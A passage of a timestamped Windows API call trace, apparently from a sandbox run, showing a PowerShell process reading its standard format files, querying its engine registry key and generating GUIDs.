	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.406] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.408] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.409] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.409] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.410] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.410] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.410] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.411] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.411] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.414] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0755.415] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0xbce, lpOverlapped=0x0) returned 1
	[0755.415] ReadFile (in: hFile=0x318, lpBuffer=0x3457476, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457476*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0755.415] ReadFile (in: hFile=0x318, lpBuffer=0x3457d40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x3457d40*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0755.415] CloseHandle (hObject=0x318) returned 1
	[0755.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.415] SetErrorMode (uMode=0x1) returned 0x1
	[0755.416] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0755.416] SetErrorMode (uMode=0x1) returned 0x1
	[0755.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.416] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0755.416] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0755.416] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0755.416] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0755.416] CoTaskMemFree (pv=0x1b805760) 
	[0755.416] RegCloseKey (hKey=0x318) returned 0x0
	[0755.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0755.418] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9fb1477c, Data2=0xa317, Data3=0x42e7, Data4=([0]=0x88, [1]=0x93, [2]=0xa5, [3]=0x77, [4]=0xf7, [5]=0x3b, [6]=0xfc, [7]=0xc9))) returned 0x0
	[0755.419] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc2b129e4, Data2=0x684b, Data3=0x490d, Data4=([0]=0x88, [1]=0x7a, [2]=0xf, [3]=0x8a, [4]=0x2c, [5]=0x4b, [6]=0x1d, [7]=0x3f))) returned 0x0
	[0755.419] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xaba4eceb, Data2=0x9c69, Data3=0x4b48, Data4=([0]=0x9d, [1]=0xb7, [2]=0x50, [3]=0x8d, [4]=0x24, [5]=0xc9, [6]=0x43, [7]=0xc2))) returned 0x0
	[0755.420] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe1af84bc, Data2=0xe165, Data3=0x4452, Data4=([0]=0x89, [1]=0xa6, [2]=0x69, [3]=0xb1, [4]=0xed, [5]=0x73, [6]=0x8c, [7]=0xd))) returned 0x0
	[0755.420] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7dac144d, Data2=0xadd, Data3=0x4683, Data4=([0]=0x87, [1]=0x92, [2]=0x90, [3]=0x24, [4]=0x97, [5]=0x19, [6]=0xcd, [7]=0xfa))) returned 0x0
	[0755.421] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x16d99828, Data2=0x7729, Data3=0x4b0c, Data4=([0]=0x9e, [1]=0x8e, [2]=0xfb, [3]=0xab, [4]=0x6, [5]=0x7e, [6]=0x0, [7]=0x8c))) returned 0x0
	[0755.421] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.422] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x2a2f5b37, Data2=0xe22d, Data3=0x47ef, Data4=([0]=0xb2, [1]=0x6a, [2]=0xdf, [3]=0x76, [4]=0x51, [5]=0xd1, [6]=0x72, [7]=0xc8))) returned 0x0
	[0755.423] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.424] VirtualQuery (in: lpAddress=0xcbbc0, lpBuffer=0xcca80, dwLength=0x30 | out: lpBuffer=0xcca80*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0755.425] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x428864db, Data2=0x5aa4, Data3=0x4995, Data4=([0]=0x82, [1]=0x94, [2]=0x18, [3]=0x66, [4]=0xf1, [5]=0x69, [6]=0xad, [7]=0x1a))) returned 0x0
	[0755.425] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x94d3a2e, Data2=0x84bc, Data3=0x4763, Data4=([0]=0x97, [1]=0xdc, [2]=0xe7, [3]=0xef, [4]=0x83, [5]=0x46, [6]=0x12, [7]=0xb4))) returned 0x0
	[0755.425] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x37223e25, Data2=0xc741, Data3=0x4edd, Data4=([0]=0x85, [1]=0x3b, [2]=0xd6, [3]=0x23, [4]=0x6b, [5]=0xc7, [6]=0x43, [7]=0x9f))) returned 0x0
	[0755.425] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x98900d35, Data2=0x5284, Data3=0x48ac, Data4=([0]=0xb5, [1]=0x6d, [2]=0x63, [3]=0xef, [4]=0xbf, [5]=0xa, [6]=0xe0, [7]=0x4b))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd82e5f8b, Data2=0xbee, Data3=0x4e71, Data4=([0]=0xa0, [1]=0xa3, [2]=0x6f, [3]=0xd3, [4]=0x9b, [5]=0x95, [6]=0x54, [7]=0xfb))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x77b0c63d, Data2=0x2677, Data3=0x4d16, Data4=([0]=0x9a, [1]=0x3f, [2]=0x95, [3]=0xd9, [4]=0x6f, [5]=0x8c, [6]=0x2d, [7]=0xc0))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x3ae54933, Data2=0x97db, Data3=0x40a3, Data4=([0]=0x84, [1]=0xa2, [2]=0x8d, [3]=0xfd, [4]=0x67, [5]=0x14, [6]=0x44, [7]=0x8c))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x134617d0, Data2=0x5bee, Data3=0x4fe3, Data4=([0]=0x86, [1]=0xc1, [2]=0x7f, [3]=0x2, [4]=0xf1, [5]=0x3a, [6]=0xd2, [7]=0x42))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x9e42d4ee, Data2=0x9fdd, Data3=0x4507, Data4=([0]=0xad, [1]=0x22, [2]=0xe5, [3]=0x14, [4]=0x37, [5]=0xc4, [6]=0x48, [7]=0x42))) returned 0x0
	[0755.426] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xac84cb2e, Data2=0x6e15, Data3=0x4b43, Data4=([0]=0xbd, [1]=0xeb, [2]=0x8b, [3]=0x5e, [4]=0xad, [5]=0xd4, [6]=0x4a, [7]=0x6b))) returned 0x0
	[0755.427] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xcd4ed287, Data2=0xaedf, Data3=0x423e, Data4=([0]=0x99, [1]=0x4b, [2]=0xd8, [3]=0xdd, [4]=0x3b, [5]=0x41, [6]=0x1b, [7]=0xf4))) returned 0x0
	[0755.427] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xe6d9a5a2, Data2=0xd39b, Data3=0x4cb3, Data4=([0]=0x8d, [1]=0xd5, [2]=0xa7, [3]=0xcd, [4]=0x3a, [5]=0x87, [6]=0x7d, [7]=0xb9))) returned 0x0
	[0755.427] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x861c2530, Data2=0x65e8, Data3=0x425d, Data4=([0]=0xad, [1]=0xfe, [2]=0x58, [3]=0x3f, [4]=0x90, [5]=0x6f, [6]=0xd7, [7]=0x4c))) returned 0x0
	[0755.427] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x35c5a928, Data2=0xec03, Data3=0x4225, Data4=([0]=0xab, [1]=0x3b, [2]=0xab, [3]=0x54, [4]=0xe7, [5]=0x6f, [6]=0xc, [7]=0x2d))) returned 0x0
	[0755.428] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb3348437, Data2=0xc6ec, Data3=0x443c, Data4=([0]=0x98, [1]=0xc, [2]=0x65, [3]=0x88, [4]=0x32, [5]=0xc3, [6]=0x64, [7]=0x6d))) returned 0x0
	[0755.428] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7614a87, Data2=0x1ce7, Data3=0x4426, Data4=([0]=0x95, [1]=0xe7, [2]=0x13, [3]=0xd0, [4]=0x87, [5]=0x22, [6]=0x1b, [7]=0x2b))) returned 0x0
	[0755.428] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xffb10ade, Data2=0x819d, Data3=0x4c64, Data4=([0]=0x9b, [1]=0x51, [2]=0xae, [3]=0x92, [4]=0xe2, [5]=0x4a, [6]=0xe7, [7]=0x5f))) returned 0x0
	[0757.081] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x937c1d76, Data2=0xddec, Data3=0x4baf, Data4=([0]=0x99, [1]=0xd0, [2]=0xee, [3]=0xbc, [4]=0xeb, [5]=0x94, [6]=0x1e, [7]=0x46))) returned 0x0
	[0757.082] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x49348933, Data2=0xaee9, Data3=0x4a45, Data4=([0]=0xa3, [1]=0x36, [2]=0x11, [3]=0xcd, [4]=0x2f, [5]=0x1c, [6]=0x9c, [7]=0x5a))) returned 0x0
	[0757.082] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x249c80e9, Data2=0xe217, Data3=0x4a6e, Data4=([0]=0x80, [1]=0xf1, [2]=0x97, [3]=0x95, [4]=0xe0, [5]=0x56, [6]=0x46, [7]=0xc6))) returned 0x0
	[0757.082] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x7855a20b, Data2=0x94bd, Data3=0x4eb6, Data4=([0]=0x87, [1]=0x55, [2]=0x14, [3]=0x89, [4]=0xcd, [5]=0x6, [6]=0x42, [7]=0xc9))) returned 0x0
	[0757.082] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xd360250b, Data2=0x72a6, Data3=0x4049, Data4=([0]=0x94, [1]=0x2d, [2]=0xc2, [3]=0xb1, [4]=0x9c, [5]=0xf4, [6]=0x62, [7]=0xa6))) returned 0x0
	[0757.083] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x6e853e5a, Data2=0x240e, Data3=0x4e8b, Data4=([0]=0x8f, [1]=0x70, [2]=0x46, [3]=0x73, [4]=0x8a, [5]=0x7, [6]=0x16, [7]=0xb2))) returned 0x0
	[0757.083] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x118af87a, Data2=0x87cd, Data3=0x449c, Data4=([0]=0x8d, [1]=0x97, [2]=0x4f, [3]=0x93, [4]=0x1e, [5]=0xc5, [6]=0xfa, [7]=0x28))) returned 0x0
	[0757.083] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xeaab465e, Data2=0xcf48, Data3=0x4821, Data4=([0]=0x84, [1]=0x3, [2]=0xa9, [3]=0x26, [4]=0xc1, [5]=0x17, [6]=0xf3, [7]=0x61))) returned 0x0
	[0757.083] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x8ec95368, Data2=0x8d7f, Data3=0x4cb8, Data4=([0]=0x80, [1]=0x61, [2]=0x39, [3]=0xf4, [4]=0xa9, [5]=0x43, [6]=0x3e, [7]=0x81))) returned 0x0
	[0757.084] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x59df1239, Data2=0xbe57, Data3=0x406f, Data4=([0]=0x9b, [1]=0x73, [2]=0x14, [3]=0xaf, [4]=0xca, [5]=0x33, [6]=0xe8, [7]=0xfd))) returned 0x0
	[0757.084] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x82ff2689, Data2=0x581a, Data3=0x4c83, Data4=([0]=0x83, [1]=0x55, [2]=0x1a, [3]=0x9d, [4]=0x53, [5]=0xc, [6]=0xa5, [7]=0x92))) returned 0x0
	[0757.084] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x81a6ceb5, Data2=0x9af7, Data3=0x499d, Data4=([0]=0xa0, [1]=0xf7, [2]=0xbc, [3]=0x90, [4]=0xbb, [5]=0x4a, [6]=0xf, [7]=0xad))) returned 0x0
	[0757.089] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1fc7d9be, Data2=0x2485, Data3=0x4c29, Data4=([0]=0x88, [1]=0x67, [2]=0xac, [3]=0x50, [4]=0x49, [5]=0x2a, [6]=0xc9, [7]=0x8f))) returned 0x0
	[0757.090] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0757.090] GetFileType (hFile=0x318) returned 0x1
	[0757.090] SetErrorMode (uMode=0x1) returned 0x1
	[0757.090] GetFileType (hFile=0x318) returned 0x1
	[0757.090] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.091] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.092] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.092] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.094] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.094] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.094] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x119, lpOverlapped=0x0) returned 1
	[0757.094] ReadFile (in: hFile=0x318, lpBuffer=0x35684f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x35684f8*, lpNumberOfBytesRead=0xccf58*=0x0, lpOverlapped=0x0) returned 1
	[0757.094] CloseHandle (hObject=0x318) returned 1
	[0757.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0757.095] SetErrorMode (uMode=0x1) returned 0x1
	[0757.095] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf00 | out: lpFileInformation=0xccf00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0757.095] SetErrorMode (uMode=0x1) returned 0x1
	[0757.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0757.102] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x318) returned 0x0
	[0757.102] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf6c, lpData=0x0, lpcbData=0xccf68*=0x0 | out: lpType=0xccf6c*=0x1, lpData=0x0, lpcbData=0xccf68*=0x56) returned 0x0
	[0757.102] CoTaskMemAlloc (cb=0x5a) returned 0x1b805760
	[0757.102] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf3c, lpData=0x1b805760, lpcbData=0xccf38*=0x56 | out: lpType=0xccf3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf38*=0x56) returned 0x0
	[0757.102] CoTaskMemFree (pv=0x1b805760) 
	[0757.103] RegCloseKey (hKey=0x318) returned 0x0
	[0757.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0757.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0757.104] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xf8b2e771, Data2=0xb9c2, Data3=0x4dd6, Data4=([0]=0x88, [1]=0xdd, [2]=0x8e, [3]=0x77, [4]=0x14, [5]=0xc7, [6]=0xc5, [7]=0xd0))) returned 0x0
	[0757.104] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xb4bbf3c0, Data2=0x47c0, Data3=0x414d, Data4=([0]=0x99, [1]=0xc, [2]=0xb1, [3]=0xc5, [4]=0xac, [5]=0xb6, [6]=0x12, [7]=0x35))) returned 0x0
	[0757.104] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x66b6532d, Data2=0xb930, Data3=0x43bd, Data4=([0]=0x95, [1]=0x15, [2]=0x7b, [3]=0xce, [4]=0xb4, [5]=0x93, [6]=0x2d, [7]=0x2c))) returned 0x0
	[0757.104] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xc3ec1a5e, Data2=0x40f, Data3=0x4aa2, Data4=([0]=0xb0, [1]=0x83, [2]=0x17, [3]=0x14, [4]=0xdd, [5]=0xba, [6]=0x69, [7]=0x1d))) returned 0x0
	[0757.104] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0757.105] GetFileType (hFile=0x318) returned 0x1
	[0757.105] SetErrorMode (uMode=0x1) returned 0x1
	[0757.105] GetFileType (hFile=0x318) returned 0x1
	[0757.105] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.105] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
	[0757.105] ReadFile (in: hFile=0x318, lpBuffer=0x33ee210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccf58, lpOverlapped=0x0 | out: lpBuffer=0x33ee210*, lpNumberOfBytesRead=0xccf58*=0x1000, lpOverlapped=0x0) returned 1
